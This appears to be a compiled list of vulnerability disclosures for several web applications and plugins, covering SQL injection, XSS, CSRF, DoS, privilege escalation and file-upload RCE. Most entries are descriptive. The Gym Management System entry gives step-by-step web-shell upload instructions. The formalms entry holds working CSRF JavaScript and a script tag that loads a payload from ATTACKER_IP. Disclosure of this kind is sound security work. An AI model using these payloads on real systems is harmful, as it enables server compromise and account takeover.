SQL injection in the Form Maker by 10Web WordPress Plugin before 5.4.1 exists via the /wordpress/wp-admin/admin.php?page=blocked_ips_fm&s=1" s parameter.
Gym Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters. Attackers can access the '/upload.php' page, set the 'id' parameter of the GET request to the desired file name for the uploaded PHP file, bypass the extension whitelist by adding a double extension, with the last one as an acceptable extension (png), bypass the file type check by modifying the 'Content-Type' of the 'file' parameter to 'image/png' in the POST request, and set the 'pupload' paramter to 'upload'. In the body of the 'file' parameter of the POST request, insert the malicious PHP code and the Web Application will rename the file to have the extension with the second item in an array of acceptable extensions, and store it in the '/upload/' directory. Access the uploaded file via the '/upload/' directory, and execute the malicious PHP code by passing a command in the 'telepathy' parameter of the GET request.
A vulnerability in Druva inSync Windows Client 6.6.3 allows for local privilege escalation due to a lack of path validation. By appending a directory traversal escape sequence at the end of a valid path, an attacker can bypass the 'strncmp' function and execute arbitrary commands with system privileges.
A denial of service vulnerability exists in Filetto 1.0, which allows an authenticated user to crash the FTP server by sending a specially crafted 'FEAT' command with an overly long string. This could allow an attacker to crash the FTP server, resulting in a denial of service condition.
When creating a thread or editing one of his messages with HTML content, it turns out that the injected characters are correctly escaped. However, when using the print feature, the characters are no longer sanitized and can be used to execute JavaScript by replacing the contents of the message with an onerror attribute.
Has been detected a Persistent XSS vulnerability in Composr CMS, that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser.
The validation of the CSRF token depends on request method. Changing the request method from POST to GET the token validation is omitted by the backend. To trigger this vulnerability the admin user must log in to the system. Setup a HTTP server on the attacker machine, e.g: python -m SimpleHTTPServer 9090. In the attacker machine create a file with this content: var target = document.location.host; var params = "r=lms/profile/show&ap=saveinfo&authentic_request=&up_lastname=&up_firstname=&up_email=hacked@admin.com&user_preference[ui.language]=0&up_signature=&save=Save+changes"; function pwnEmail(){ var xhr = new XMLHttpRequest(); xhr.open("GET", "http://" + target + "/formalms/appLms/index.php?"+params, true); xhr.send(null); } pwnEmail(); Edit a course and in the description field put this payload: <script src="http://ATTACKER_IP:PORT/payload.js"/> The description field is vulnerable to XSS attacks and is used to trigger the csrf payload. Go to index page in formalms/appLms/index.php?r=lms/mycourses/show this trigger the XSS payload in the description field (the payload loads the payload.js file and execute the CSRF payload) The payload.js file is executed and the admin email is changed.
CraftCMS 3 vCard Plugin 1.0.0 is vulnerable to a deserialization vulnerability which can be exploited to achieve remote code execution. An attacker can craft a malicious payload and send it to the vulnerable endpoint to execute arbitrary code on the server.
Submitty through 20.04.01 allows XSS via upload of an SVG document, as demonstrated by an attack by a Student against a Teaching Fellow. This vulnerability can potentially enable any student to takeover the account of TA if they open the attachment as the cookie gets exposed. To exploit this vulnerability, a student must login, go to a gradeable page, and upload a malicious SVG file with any XSS payload. The TA must then open the same page for grading, which will trigger the XSS payload.
I've identified an SQL injection vulnerability in the php-fusion 9.03.50 that affects the endpoint /php-fusion/administration/comments.php and can be exploited via the ctype param. An attacker can manipulate the SQL statements that are sent to the MySQL database and inject malicious SQL statements. The attacker is able to change the logic of SQL statements executed against the database or extract sensitive information.
Services By CQR